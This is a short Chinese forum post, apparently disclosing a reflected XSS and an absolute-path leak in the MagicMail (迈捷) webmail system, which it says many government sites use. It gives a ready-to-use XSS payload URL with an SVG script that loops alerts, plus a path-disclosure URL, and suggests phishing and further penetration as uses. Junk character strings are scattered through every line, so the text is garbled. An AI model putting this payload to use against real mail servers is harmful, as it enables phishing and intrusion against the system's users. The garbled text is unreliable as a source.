今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞- G* ~/ l9 k( e. g
& R, N' m/ Y [& ~* i7 j
- `! W+ t- j# _6 j( }& V5 y5 [
包含 一个反射性XSS 以及 绝对路径泄漏
- z2 R3 d0 {8 g看了看 貌似全部是linux的。
8 j/ k8 l; ~1 q- H- s 7 V, Y- N% ?& g- C7 [- T
关键字:迈捷邮件系统 by MagicMail6 C8 ^8 S! \) w# U0 H* e& E
/ @3 R, Y! y. m" h0 _9 m9 H- q
可以看到很多政府网站都用这个邮件系统
5 m m, ?% O3 h" h9 H$ E4 z; r% G& V5 g$ r1 M x
绝对路径 http://madman.in/index.php?login_type=declare&language=
6 m2 S0 Z( e2 z* h7 ~8 o* k3 k: w O/ {0 E, o
* P. @* z# J1 y, P& w6 L% X
- b, u* C) ~* e d eXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
" A* J6 H6 _ z9 ?- {
4 n; P) J9 D+ e: I1 a
- O0 y3 b3 s r: e* f
" b& Y' B: Z( d' R虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等$ ^% V* n3 k9 `) y* T
( ~& U8 y, w* D( ^* P% q修复方案:看官方补丁吧。/ e+ K5 f4 \* H" K1 x: Q! y2 Q8 V3 A
|